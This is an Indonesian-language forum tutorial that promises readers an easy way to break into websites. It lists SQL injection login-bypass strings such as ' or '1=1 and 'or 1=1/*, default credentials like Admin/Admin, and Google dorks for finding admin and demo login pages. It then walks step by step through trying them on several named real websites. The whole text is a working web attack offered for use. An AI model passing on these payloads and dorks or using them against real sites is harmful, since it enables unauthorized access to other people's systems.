Tutorial cara mudah menerobos ke sebuah Website

Diambil dari : http://forum-2ka01.co.cc

Banyak orang yang mendewa kan Cracker (Para Peretas) karena mahir dalam menyusup ke sebuah sistem. Mulai sekarang buang jauh-jauh persepsi itu, karena anda juga bisa menerobos masuk ke sebuah sistem dengan mudah (tanpa keringat) dibanding para Cracker tadi. Ini serius, gak becanda! Mau tau caranya?

Vuln : SQL Injection

Exploit :

Username : Admin Password : Admin
Username : Admin Password : ‘ or ’1=1
Username : Admin Password : Kosong
Username : Admin Password : ‘or 1=1/*
Username: ‘ or ’1=1 Password : ‘ or ’1=1
Username: ‘ or ’1=1 Password : Kosong
Username : ‘or 1=1/* Password : ‘or 1=1/*
Username : ‘or 1=1/* Password : Kosong
Username & Password ditampilkan di layar

Dorks :
allinurl:demo/login.php
allinurl:/demo/admin/index.php

1.Pertama pilih dahulu mau pake dorks yang mana?
2.Kita pake yang pertama dolo yak
3.Buka google.co.uk
4.Ketikkan keywordnya : demo/login.php
5.Saya ambil contoh, http://testlink.org/demo/login.php
Username & Password ditampilkan di layar
Atau

http://www.simplecustomer.com/demo/login.php

Username & Password sudah terisi

Nah sekarang kita pake dorks yang ke-dua
1.Buka google.co.uk
2.Ketikkan keywordnya : /demo/admin/index.php
3.Gw ambil contoh : http://www.helpdeskpilot.com/demo/admin/index.php
Username : Admin
Password : Admin
Atau

http://phpclassifiedsscript.com/demo/admin/login.php

Username & Password sudah terisi